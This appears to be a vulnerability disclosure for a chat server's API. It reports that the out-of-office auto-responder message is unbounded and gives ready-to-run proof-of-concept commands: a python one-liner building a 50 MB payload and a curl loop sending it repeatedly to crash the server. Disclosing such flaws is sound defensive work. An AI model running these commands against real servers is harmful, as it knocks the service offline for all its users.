A user can enable and modify its automatic response message, that is automatically sent when the user has the “Out of Office” status. This response message doesn’t have any size check or validation, which allows an attacker to set an almost unlimited number of characters as the response value.
In a production environment is possible to set up to 50MB of data, due to the default nginx configuration, as the response message value, which causes the server to stop responding to user requests and ultimately leads to the server crash due to the incapacity to update and handle such a large amount of data.
MMAUTHTOKEN
authentication token.python2.7 -c "print 'A' * 50000000"
PUT
request to the /api/v4/users/me/patch
API Endpoint:PUT http://localhost:8065/api/v4/users/me/patch
Content-Type: application/json
X-CSRF-TOKEN: <csrf-token>
Cookie: MMAUTHTOKEN=<token>
{"notify_props":{"auto_responder_active":"true","auto_responder_message":"<payload>"}}
The steps 3-6 can be automated using the following 2 commands:
$ python2.7 -c "print '{\"notify_props\":{\"auto_responder_active\":\"true\",\"auto_responder_message\":\"' + 'A' * 50000000 + '\"}}'" > payload
$ for ((i = 0; i < 5; i++)); do curl -X PUT "http://<domain>/api/v4/users/me/patch" -H 'Content-Type: application/json' -d @payload --cookie "MMAUTHTOKEN=<token>" -H "X-CSRF-TOKEN: <csrf-token>" &; done;
A user can cause a full denial of service attack in the application server, making the application server unavailable to all its users.